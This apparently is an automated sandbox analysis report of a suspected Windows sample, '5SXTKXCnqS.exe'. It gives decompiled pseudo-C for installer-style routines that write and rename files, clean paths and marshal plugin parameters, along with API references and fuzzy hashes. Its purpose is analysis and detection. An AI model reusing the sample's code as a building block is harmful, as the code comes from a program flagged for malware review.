                                                                                    0x004059c2
                                                                                    0x00405a27
                                                                                    0x00405a2e
                                                                                    0x004059d5
                                                                                    0x004059d5
                                                                                    0x004059d7
                                                                                    0x004059e0
                                                                                    0x004059eb
                                                                                    0x004059fd
                                                                                    0x00405a04
                                                                                    0x00000000
                                                                                    0x00405a04
                                                                                    0x00405a30
                                                                                    0x00405a31
                                                                                    0x00405a36
                                                                                    0x00405a38
                                                                                    0x00405a45
                                                                                    0x00405a45
                                                                                    0x00405a49
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405a3a
                                                                                    0x00405a3a
                                                                                    0x00405a3d
                                                                                    0x00405a40
                                                                                    0x00405a41
                                                                                    0x00000000
                                                                                    0x00405a3a
                                                                                    0x004059cd
                                                                                    0x004059d2
                                                                                    0x00000000
                                                                                    0x004059d2
                                                                                    0x00405999
                                                                                    0x004058f6
                                                                                    0x00405901
                                                                                    0x0040590a
                                                                                    0x0040590e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040590e
                                                                                    0x00405a1b

                                                                                    APIs
                                                                                      • Part of subcall function 00405E88: GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
                                                                                      • Part of subcall function 00405E88: LoadLibraryA.KERNELBASE(?,?,00000000,0040327F,00000008), ref: 00405EA5
                                                                                      • Part of subcall function 00405E88: GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6
                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,00405649,?,00000000,000000F1,?), ref: 00405901
                                                                                    • GetShortPathNameA.KERNEL32 ref: 0040590A
                                                                                    • GetShortPathNameA.KERNEL32 ref: 00405927
                                                                                    • wsprintfA.USER32 ref: 00405945
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,004220A8,C0000000,00000004,004220A8,?,?,?,00000000,000000F1,?), ref: 00405980
                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 0040598F
                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004059A5
                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421CA8,00000000,-0000000A,00409350,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004059EB
                                                                                    • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 004059FD
                                                                                    • GlobalFree.KERNEL32 ref: 00405A04
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405A0B
                                                                                      • Part of subcall function 004057B2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057B9
                                                                                      • Part of subcall function 004057B2: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057E9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                                                                                    • String ID: %s=%s$0&B$[Rename]
                                                                                    • API String ID: 3772915668-951905037
                                                                                    • Opcode ID: 0c179fa3417d280b53e5d95a4378c92fb06f2b6e7dc6de3d5fc3f6893b1dd3a2
                                                                                    • Instruction ID: 8912a0e40cac8f66f34925055924fb713260e7a12edb00ecfb1cfbef244c1689
                                                                                    • Opcode Fuzzy Hash: 0c179fa3417d280b53e5d95a4378c92fb06f2b6e7dc6de3d5fc3f6893b1dd3a2
                                                                                    • Instruction Fuzzy Hash: D9411332B05B11BBD3216B61AD88F6B3A5CDB84715F140136FE05F22C2E678A801CEBD
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 73CA24D8, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 124COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 89%
                                                                                    			E73CA24D8(intOrPtr* _a4) {
				char _v80;
				int _v84;
				intOrPtr _v88;
				short _v92;
				intOrPtr* _t28;
				void* _t30;
				intOrPtr _t31;
				signed int _t43;
				void* _t44;
				intOrPtr _t45;
				void* _t48;

				_t44 = E73CA1215();
				_t28 = _a4;
				_t45 =  *((intOrPtr*)(_t28 + 0x814));
				_v88 = _t45;
				_t48 = (_t45 + 0x41 << 5) + _t28;
				do {
					if( *((intOrPtr*)(_t48 - 4)) >= 0) {
					}
					_t43 =  *(_t48 - 8) & 0x000000ff;
					if(_t43 <= 7) {
						switch( *((intOrPtr*)(_t43 * 4 +  &M73CA2626))) {
							case 0:
								 *_t44 = 0;
								goto L17;
							case 1:
								__eax =  *__eax;
								if(__ecx > __ebx) {
									_v84 = __ecx;
									__ecx =  *(0x73ca307c + __edx * 4);
									__edx = _v84;
									__ecx = __ecx * __edx;
									asm("sbb edx, edx");
									__edx = __edx & __ecx;
									__eax = __eax &  *(0x73ca309c + __edx * 4);
								}
								_push(__eax);
								goto L15;
							case 2:
								__eax = E73CA1429(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L16;
							case 3:
								__eax = lstrcpynA(__edi,  *__eax,  *0x73ca405c);
								goto L17;
							case 4:
								__ecx =  *0x73ca405c;
								__edx = __ecx - 1;
								__eax = WideCharToMultiByte(__ebx, __ebx,  *__eax, __ecx, __edi, __edx, __ebx, __ebx);
								__eax =  *0x73ca405c;
								 *((char*)(__eax + __edi - 1)) = __bl;
								goto L17;
							case 5:
								__ecx =  &_v80;
								_push(0x27);
								_push(__ecx);
								_push( *__eax);
								" {<u@u<u"();
								__eax =  &_v92;
								__eax = WideCharToMultiByte(__ebx, __ebx,  &_v92,  &_v92, __edi,  *0x73ca405c, __ebx, __ebx);
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfA(__edi, 0x73ca4000);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					_t30 =  *(_t48 + 0x14);
					if(_t30 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t48 - 4)) > 0)) {
						GlobalFree(_t30);
					}
					_t31 =  *((intOrPtr*)(_t48 + 0xc));
					if(_t31 != 0) {
						if(_t31 != 0xffffffff) {
							if(_t31 > 0) {
								E73CA12D1(_t31 - 1, _t44);
								goto L26;
							}
						} else {
							E73CA1266(_t44);
							L26:
						}
					}
					_v88 = _v88 - 1;
					_t48 = _t48 - 0x20;
				} while (_v88 >= 0);
				return GlobalFree(_t44);
			}














                                                                                    0x73ca24e4
                                                                                    0x73ca24e6
                                                                                    0x73ca24f0
                                                                                    0x73ca24f6
                                                                                    0x73ca2500
                                                                                    0x73ca2504
                                                                                    0x73ca2509
                                                                                    0x73ca2509
                                                                                    0x73ca2511
                                                                                    0x73ca2518
                                                                                    0x73ca251e
                                                                                    0x00000000
                                                                                    0x73ca2525
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca252c
                                                                                    0x73ca2530
                                                                                    0x73ca2533
                                                                                    0x73ca2537
                                                                                    0x73ca253e
                                                                                    0x73ca2542
                                                                                    0x73ca2548
                                                                                    0x73ca254a
                                                                                    0x73ca254c
                                                                                    0x73ca254c
                                                                                    0x73ca2553
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca255c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca256c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca2598
                                                                                    0x73ca25a0
                                                                                    0x73ca25aa
                                                                                    0x73ca25ac
                                                                                    0x73ca25b1
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca2574
                                                                                    0x73ca2578
                                                                                    0x73ca257a
                                                                                    0x73ca257b
                                                                                    0x73ca257d
                                                                                    0x73ca258d
                                                                                    0x73ca2594
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca25b7
                                                                                    0x73ca25b9
                                                                                    0x73ca25bf
                                                                                    0x73ca25c5
                                                                                    0x73ca25c5
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca251e
                                                                                    0x73ca25c8
                                                                                    0x73ca25c8
                                                                                    0x73ca25cd
                                                                                    0x73ca25de
                                                                                    0x73ca25de
                                                                                    0x73ca25e4
                                                                                    0x73ca25e9
                                                                                    0x73ca25ee
                                                                                    0x73ca25fa
                                                                                    0x73ca25ff
                                                                                    0x00000000
                                                                                    0x73ca2604
                                                                                    0x73ca25f0
                                                                                    0x73ca25f1
                                                                                    0x73ca2605
                                                                                    0x73ca2605
                                                                                    0x73ca25ee
                                                                                    0x73ca2606
                                                                                    0x73ca260a
                                                                                    0x73ca260d
                                                                                    0x73ca2625

                                                                                    APIs
                                                                                      • Part of subcall function 73CA1215: GlobalAlloc.KERNEL32(00000040,73CA1233,?,73CA12CF,-73CA404B,73CA11AB,-000000A0), ref: 73CA121D
                                                                                    • GlobalFree.KERNEL32 ref: 73CA25DE
                                                                                    • GlobalFree.KERNEL32 ref: 73CA2618
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.241754228.0000000073CA1000.00000020.00020000.sdmp, Offset: 73CA0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.241748462.0000000073CA0000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.241762854.0000000073CA3000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.241781372.0000000073CA5000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Global$Free$Alloc
                                                                                    • String ID: {<u@u<u
                                                                                    • API String ID: 1780285237-2852364109
                                                                                    • Opcode ID: 37c8caa45306edd175d8384fc0a9d67028a2f2d5d4e6640221620682e7f2faa4
                                                                                    • Instruction ID: fe92bb586b8e9afbb5afae07ed1b5443a18ee012877f29ab81399441cd4b8107
                                                                                    • Opcode Fuzzy Hash: 37c8caa45306edd175d8384fc0a9d67028a2f2d5d4e6640221620682e7f2faa4
                                                                                    • Instruction Fuzzy Hash: 7641F672508256EFD306EF59CC94E2AB7BAFB85300B15452DF546EB240DB31ED04EB61
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 73CA22F1, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 86%
                                                                                    			E73CA22F1(void* __edx, intOrPtr _a4) {
				signed int _v4;
				signed int _v8;
				void* _t38;
				signed int _t39;
				void* _t40;
				void* _t43;
				void* _t48;
				signed int* _t50;
				signed char* _t51;

				_v8 = 0 |  *((intOrPtr*)(_a4 + 0x814)) > 0x00000000;
				while(1) {
					_t9 = _a4 + 0x818; // 0x818
					_t51 = (_v8 << 5) + _t9;
					_t38 = _t51[0x18];
					if(_t38 == 0) {
						goto L9;
					}
					_t48 = 0x1a;
					if(_t38 == _t48) {
						goto L9;
					}
					if(_t38 != 0xffffffff) {
						if(_t38 <= 0 || _t38 > 0x19) {
							_t51[0x18] = _t48;
						} else {
							_t38 = E73CA12AD(_t38 - 1);
							L10:
						}
						goto L11;
					} else {
						_t38 = E73CA123B();
						L11:
						_t43 = _t38;
						_t13 =  &(_t51[8]); // 0x820
						_t50 = _t13;
						if(_t51[4] >= 0) {
						}
						_t39 =  *_t51 & 0x000000ff;
						_t51[0x1c] = _t51[0x1c] & 0x00000000;
						_v4 = _t39;
						if(_t39 > 7) {
							L27:
							_t40 = GlobalFree(_t43);
							if(_v8 == 0) {
								return _t40;
							}
							if(_v8 !=  *((intOrPtr*)(_a4 + 0x814))) {
								_v8 = _v8 + 1;
							} else {
								_v8 = _v8 & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t39 * 4 +  &M73CA247E))) {
								case 0:
									 *_t50 =  *_t50 & 0x00000000;
									goto L27;
								case 1:
									__eax = E73CA12FE(__ebx);
									goto L20;
								case 2:
									 *__ebp = E73CA12FE(__ebx);
									_a4 = __edx;
									goto L27;
								case 3:
									__eax = E73CA1224(__ebx);
									 *(__esi + 0x1c) = __eax;
									L20:
									 *__ebp = __eax;
									goto L27;
								case 4:
									 *0x73ca405c =  *0x73ca405c +  *0x73ca405c;
									__edi = GlobalAlloc(0x40,  *0x73ca405c +  *0x73ca405c);
									 *0x73ca405c = MultiByteToWideChar(0, 0, __ebx,  *0x73ca405c, __edi,  *0x73ca405c);
									if(_v4 != 5) {
										 *(__esi + 0x1c) = __edi;
										 *__ebp = __edi;
									} else {
										__eax = GlobalAlloc(0x40, 0x10);
										_push(__eax);
										 *(__esi + 0x1c) = __eax;
										_push(__edi);
										 *__ebp = __eax;
										__imp__CLSIDFromString();
										__eax = GlobalFree(__edi);
									}
									goto L27;
								case 5:
									if( *__ebx != 0) {
										__eax = E73CA12FE(__ebx);
										 *__edi = __eax;
									}
									goto L27;
								case 6:
									__esi =  *(__esi + 0x18);
									__esi = __esi - 1;
									__esi = __esi *  *0x73ca405c;
									__esi = __esi +  *0x73ca4064;
									__eax = __esi + 0xc;
									 *__edi = __esi + 0xc;
									asm("cdq");
									__eax = E73CA1429(__edx, __esi + 0xc, __edx, __esi);
									goto L27;
							}
						}
					}
					L9:
					_t38 = E73CA1224(0x73ca4034);
					goto L10;
				}
			}












                                                                                    0x73ca2306
                                                                                    0x73ca230a
                                                                                    0x73ca2315
                                                                                    0x73ca2315
                                                                                    0x73ca231c
                                                                                    0x73ca2321
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca2325
                                                                                    0x73ca2328
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca232d
                                                                                    0x73ca2338
                                                                                    0x73ca2348
                                                                                    0x73ca233f
                                                                                    0x73ca2341
                                                                                    0x73ca2357
                                                                                    0x73ca2357
                                                                                    0x00000000
                                                                                    0x73ca232f
                                                                                    0x73ca232f
                                                                                    0x73ca2358
                                                                                    0x73ca235c
                                                                                    0x73ca235e
                                                                                    0x73ca235e
                                                                                    0x73ca2361
                                                                                    0x73ca2361
                                                                                    0x73ca2369
                                                                                    0x73ca236c
                                                                                    0x73ca2373
                                                                                    0x73ca2377
                                                                                    0x73ca2446
                                                                                    0x73ca2447
                                                                                    0x73ca2452
                                                                                    0x73ca247d
                                                                                    0x73ca247d
                                                                                    0x73ca2462
                                                                                    0x73ca246e
                                                                                    0x73ca2464
                                                                                    0x73ca2464
                                                                                    0x73ca2464
                                                                                    0x00000000
                                                                                    0x73ca237d
                                                                                    0x73ca237d
                                                                                    0x00000000
                                                                                    0x73ca2384
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca238d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca239b
                                                                                    0x73ca239e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca23a7
                                                                                    0x73ca23ac
                                                                                    0x73ca23af
                                                                                    0x73ca23b0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca23bd
                                                                                    0x73ca23c8
                                                                                    0x73ca23d7
                                                                                    0x73ca23e2
                                                                                    0x73ca2405
                                                                                    0x73ca2408
                                                                                    0x73ca23e4
                                                                                    0x73ca23e8
                                                                                    0x73ca23ee
                                                                                    0x73ca23ef
                                                                                    0x73ca23f2
                                                                                    0x73ca23f3
                                                                                    0x73ca23f6
                                                                                    0x73ca23fd
                                                                                    0x73ca23fd
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca2410
                                                                                    0x73ca2413
                                                                                    0x73ca241f
                                                                                    0x73ca2421
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca2424
                                                                                    0x73ca2427
                                                                                    0x73ca2428
                                                                                    0x73ca242f
                                                                                    0x73ca2436
                                                                                    0x73ca2439
                                                                                    0x73ca243b
                                                                                    0x73ca243e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca237d
                                                                                    0x73ca2377
                                                                                    0x73ca234d
                                                                                    0x73ca2352
                                                                                    0x00000000
                                                                                    0x73ca2352

                                                                                    APIs
                                                                                    • GlobalFree.KERNEL32 ref: 73CA2447
                                                                                      • Part of subcall function 73CA1224: lstrcpynA.KERNEL32(00000000,?,73CA12CF,-73CA404B,73CA11AB,-000000A0), ref: 73CA1234
                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 73CA23C2
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 73CA23D7
                                                                                    • GlobalAlloc.KERNEL32(00000040,00000010), ref: 73CA23E8
                                                                                    • CLSIDFromString.OLE32(00000000,00000000), ref: 73CA23F6
                                                                                    • GlobalFree.KERNEL32 ref: 73CA23FD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.241754228.0000000073CA1000.00000020.00020000.sdmp, Offset: 73CA0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.241748462.0000000073CA0000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.241762854.0000000073CA3000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.241781372.0000000073CA5000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                                    • String ID: @u<u
                                                                                    • API String ID: 3730416702-3153514966
                                                                                    • Opcode ID: e162be4fb63237a3e9fe8bfd458b2d71b1285eb2f4eaa1a047819c714fa2257c
                                                                                    • Instruction ID: 34f13aab7d82489ecf4dfad58e8f68bf9889927470b882e5daa59f4ccaa906f8
                                                                                    • Opcode Fuzzy Hash: e162be4fb63237a3e9fe8bfd458b2d71b1285eb2f4eaa1a047819c714fa2257c
                                                                                    • Instruction Fuzzy Hash: 4A41B17150936ADFE311DF698844B6AB7FCFB41311F12491AF58AEB180DB70E944CB61
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00405DC8, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00405DC8(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E004056C6(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405684("*?|<>/\":", _t5))) == 0) {
							E004057FE(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                                    0x00405dca
                                                                                    0x00405dd2
                                                                                    0x00405de6
                                                                                    0x00405de6
                                                                                    0x00405dec
                                                                                    0x00405df9
                                                                                    0x00405df9
                                                                                    0x00405dfa
                                                                                    0x00405dfc
                                                                                    0x00405e00
                                                                                    0x00405e02
                                                                                    0x00405e0b
                                                                                    0x00405e0d
                                                                                    0x00405e27
                                                                                    0x00405e2f
                                                                                    0x00405e2f
                                                                                    0x00405e34
                                                                                    0x00405e36
                                                                                    0x00405e38
                                                                                    0x00405e3c
                                                                                    0x00405e3d
                                                                                    0x00405e40
                                                                                    0x00405e48
                                                                                    0x00405e4a
                                                                                    0x00405e4e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405e54
                                                                                    0x00405e59
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405e59
                                                                                    0x00405e5e

                                                                                    APIs
                                                                                    • CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\5SXTKXCnqS.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E20
                                                                                    • CharNextA.USER32(?,?,?,00000000), ref: 00405E2D
                                                                                    • CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\5SXTKXCnqS.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E32
                                                                                    • CharPrevA.USER32(?,?,"C:\Users\user\Desktop\5SXTKXCnqS.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E42
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Char$Next$Prev
                                                                                    • String ID: "C:\Users\user\Desktop\5SXTKXCnqS.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                    • API String ID: 589700163-2235789558
                                                                                    • Opcode ID: d60fa47d96b079028a76cfcdb2d30976ede71f36b1f4f1e1bc9c50cb25bd2be5
                                                                                    • Instruction ID: 3b6179abbfe29fc78842bf11aa846075366cc437f950451d76d565b88bc2b460
                                                                                    • Opcode Fuzzy Hash: d60fa47d96b079028a76cfcdb2d30976ede71f36b1f4f1e1bc9c50cb25bd2be5
                                                                                    • Instruction Fuzzy Hash: A0110861805B9129EB3227284C48BBB7F89CF66754F18447FD8C4722C2C67C5D429FAD
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00403F7F, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00403F7F(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                                                                    0x00403f91
                                                                                    0x00404025
                                                                                    0x00000000
                                                                                    0x00404025
                                                                                    0x00403fa2
                                                                                    0x00403fa6
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403fac
                                                                                    0x00403fb5
                                                                                    0x00403fb8
                                                                                    0x00403fb8
                                                                                    0x00403fbe
                                                                                    0x00403fc4
                                                                                    0x00403fc4
                                                                                    0x00403fd0
                                                                                    0x00403fd6
                                                                                    0x00403fdd
                                                                                    0x00403fe0
                                                                                    0x00403fe3
                                                                                    0x00403fe5
                                                                                    0x00403fe5
                                                                                    0x00403fed
                                                                                    0x00403ff3
                                                                                    0x00403ff3
                                                                                    0x00403ffd
                                                                                    0x00404002
                                                                                    0x00404005
                                                                                    0x0040400a
                                                                                    0x0040400d
                                                                                    0x0040400d
                                                                                    0x0040401d
                                                                                    0x0040401d
                                                                                    0x00000000

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2320649405-0
                                                                                    • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                                                                    • Instruction ID: 4cc26f8bf5fc777f430f8318c3ba194748f169832e683f7fcd21add738ba3f9d
                                                                                    • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                                                                    • Instruction Fuzzy Hash: C221C371904705ABCB209F78DD08B4BBBF8AF40711F048A29F992F26E0C738E904CB55
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040267C, Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 93%
                                                                                    			E0040267C(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *(_t58 - 8) = 0xfffffd66;
				_t52 = E004029F6(0xfffffff0);
				 *(_t58 - 0x44) = _t24;
				if(E004056C6(_t52) == 0) {
					E004029F6(0xffffffed);
				}
				E0040581E(_t52);
				_t27 = E0040583D(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x423eb4;
					 *(_t58 - 0x2c) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004031F1(_t47);
						E004031BF(_t51,  *(_t58 - 0x2c));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
						 *(_t58 - 0x30) = _t56;
						if(_t56 != _t47) {
							E00402F18(_t49,  *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x38) =  *_t56;
								E004057FE( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x38);
							}
							GlobalFree( *(_t58 - 0x30));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
						GlobalFree(_t51);
						 *(_t58 - 8) = E00402F18(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *(_t58 - 8) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x44));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











                                                                                    0x0040267c
                                                                                    0x0040267e
                                                                                    0x0040268a
                                                                                    0x0040268d
                                                                                    0x00402697
                                                                                    0x0040269b
                                                                                    0x0040269b
                                                                                    0x004026a1
                                                                                    0x004026ae
                                                                                    0x004026b6
                                                                                    0x004026b9
                                                                                    0x004026bf
                                                                                    0x004026cd
                                                                                    0x004026d2
                                                                                    0x004026d6
                                                                                    0x004026d9
                                                                                    0x004026e2
                                                                                    0x004026ee
                                                                                    0x004026f2
                                                                                    0x004026f5
                                                                                    0x004026ff
                                                                                    0x0040271e
                                                                                    0x00402706
                                                                                    0x0040270b
                                                                                    0x00402713
                                                                                    0x00402716
                                                                                    0x0040271b
                                                                                    0x0040271b
                                                                                    0x00402725
